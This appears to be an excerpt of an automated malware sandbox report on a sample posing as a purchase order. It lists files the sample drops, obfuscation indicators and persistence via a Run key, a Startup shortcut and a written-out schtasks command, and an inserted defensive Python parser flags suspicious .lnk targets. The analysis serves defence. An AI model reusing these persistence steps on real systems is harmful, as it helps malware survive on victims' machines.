                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: tquery.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: cryptdll.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: spp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vssapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vsstrace.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: spp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vssapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vsstrace.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: spp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vssapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vsstrace.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppwmi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: slc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppcext.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winscard.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: devobj.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: edgegdi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: amsi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: userenv.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: version.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: gpapi.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: textshaping.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: textinputframework.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: coreuicomponents.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: coremessaging.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: ntmarta.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: wintypes.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: wintypes.dll
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: wintypes.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: version.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: edgegdi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: url.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieframe.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: iertutil.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: netapi32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: userenv.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winhttp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wkscli.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: netutils.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: amsi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: smartscreenps.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winmm.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wininet.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                          Source: apihost.exe.lnk.5.dr | LNK file: ..\..\..\..\..\ACCApi\apihost.exe
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Automated click: OK
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Automated click: OK
                          Source: Window Recorder | Window detected: More than 3 window changes detected
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                          Source: PO_B2W984.com | Static file information: File size 2145792 > 1048576
                          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb*Q source: rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000003.23071203235.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B721000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E85C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: easinvoker.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: easinvoker.pdbGCTL source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C19000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C48000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007C3000.00000004.00000020.00020000.00000000.sdmp
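The `LNK file: ..\..\..\..\..\ACCApi\apihost.exe` row above records a dropped shortcut whose target is stored as a path relative to the folder the shortcut sits in, which is how a Startup-folder link can point at a payload several directories up without naming an absolute path. The block below is an added example, not Joe Sandbox's code or anything from the sample: it parses the StringData block of a Shell Link (the MS-SHLLINK layout) in pure Python, resolves RELATIVE_PATH against the folder the link lives in, and flags targets that resolve outside it. The Startup folder path and the `build_lnk` helper that fabricates a header-only shortcut are assumptions for the demonstration; the report names only the file and its relative target, not where the .lnk was written.

```python
import ntpath
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80        # LinkFlags bits (MS-SHLLINK 2.1.1)
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))   # StringData members, in file order

def lnk_strings(lnk):
    """Parse the StringData block of a .lnk: skip LinkTargetIDList and LinkInfo when present,
    then read each length-prefixed string whose LinkFlags bit is set."""
    if struct.unpack_from("<I", lnk, 0)[0] != 0x4C or lnk[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", lnk, 20)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:
        pos += 2 + struct.unpack_from("<H", lnk, pos)[0]      # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", lnk, pos)[0]          # LinkInfoSize includes itself
    out = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", lnk, pos)[0]      # CountCharacters, no terminator
            pos += 2
            if flags & IS_UNICODE:
                out[key] = lnk[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                out[key] = lnk[pos:pos + count].decode("cp1252", "replace")
                pos += count
    return out

def resolve_startup_lnk(lnk, startup_dir):
    """Resolve a shortcut's RELATIVE_PATH against the folder it sits in.
    Returns (resolved target, True if the target lies outside that folder)."""
    rel = lnk_strings(lnk).get("relative_path")
    if rel is None:
        return None, False
    target = ntpath.normpath(ntpath.join(startup_dir, rel))
    inside = target.lower().startswith(ntpath.normpath(startup_dir).lower() + "\\")
    return target, not inside

def build_lnk(relative_path):
    """Constructed sample input: a header-only Unicode shortcut carrying just RELATIVE_PATH."""
    flags = 0x08 | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, times, size, icon, SW_SHOWNORMAL
    return header + struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")

# Assumed location of the dropped shortcut; the report does not state where the .lnk was written.
STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_LNK = build_lnk(r"..\..\..\..\..\ACCApi\apihost.exe")   # relative target as listed in the report

if __name__ == "__main__":
    print(resolve_startup_lnk(SAMPLE_LNK, STARTUP_DIR))
```

On a live host the same function can be applied to every `*.lnk` under the per-user and all-users Startup folders; a RELATIVE_PATH that climbs out of the folder, or one whose resolved target sits under a user-writable tree, is the condition to alert on. The parser reads only the string block, so a link that stores its target solely in the ID list or LinkInfo returns no `relative_path` and is reported as `(None, False)` rather than silently treated as benign.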

                          Data Obfuscation

                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 15.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 19.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 15.2.rpkhzpuO.pif.400000.0.unpack
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 19.2.rpkhzpuO.pif.400000.0.unpack
                          Source: Yara match | File source: 0.2.PO_B2W984.com.24366a8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.PO_B2W984.com.2dd0000.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.PO_B2W984.com.24366a8.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000003.22895700001.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000004.00000001.22963397742.00000000017D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.22967000001.0000000002436000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: rpkhzpuO.pif.0.dr | Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE8798 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02DE8798
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD32FC push eax; ret 0_2_02DD3338
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DFC2FC push 02DFC367h; ret 0_2_02DFC35F
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD635C push 02DD63B7h; ret 0_2_02DD63AF
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD635A push 02DD63B7h; ret 0_2_02DD63AF
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DFC0AC push 02DFC125h; ret 0_2_02DFC11D
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DFC1F8 push 02DFC288h; ret 0_2_02DFC280
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DFC144 push 02DFC1ECh; ret 0_2_02DFC1E4
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE86B8 push 02DE86FAh; ret 0_2_02DE86F2
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD6738 push 02DD677Ah; ret 0_2_02DD6772
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD6736 push 02DD677Ah; ret 0_2_02DD6772
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DDC4EC push ecx; mov dword ptr [esp], edx 0_2_02DDC4F1
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEE5AC push ecx; mov dword ptr [esp], edx 0_2_02DEE5B1
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DDD520 push 02DDD54Ch; ret 0_2_02DDD544
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DDCB5B push 02DDCCF2h; ret 0_2_02DDCCEA
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DDCB6C push 02DDCCF2h; ret 0_2_02DDCCEA
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DFBB64 push 02DFBD8Ch; ret 0_2_02DFBD84
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE68C8 push 02DE6973h; ret 0_2_02DE696B
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE68C6 push 02DE6973h; ret 0_2_02DE696B
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE788C push 02DE7909h; ret 0_2_02DE7901
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEA918 push 02DEA950h; ret 0_2_02DEA948
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEA917 push 02DEA950h; ret 0_2_02DEA948
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE8910 push 02DE8948h; ret 0_2_02DE8940
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE890E push 02DE8948h; ret 0_2_02DE8940
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE2EE0 push 02DE2F56h; ret 0_2_02DE2F4E
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE2FEC push 02DE3039h; ret 0_2_02DE3031
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE2FEB push 02DE3039h; ret 0_2_02DE3031
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE5DFC push ecx; mov dword ptr [esp], edx 0_2_02DE5DFE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0041C40C push cs; iretd 4_1_0041C4E2
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00423149 push eax; ret 4_1_00423179
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0041C50E push cs; iretd 4_1_0041C4E2
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004231C8 push eax; ret 4_1_00423179
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\PO_B2W984.com | File created: C:\Users\Public\Libraries\Oupzhkpr.PIF
                          Source: C:\Users\user\Desktop\PO_B2W984.com | File created: C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\user\Desktop\PO_B2W984.com | File created: C:\Windows \SysWOW64\truesight.sys
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | File created: C:\Windows \SysWOW64\truesight.sys
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File created: C:\Users\user\AppData\Local\Temp\Microsofts.exe
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                          Boot Survival

                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr

                          Hooking and other Techniques for Hiding and Protection

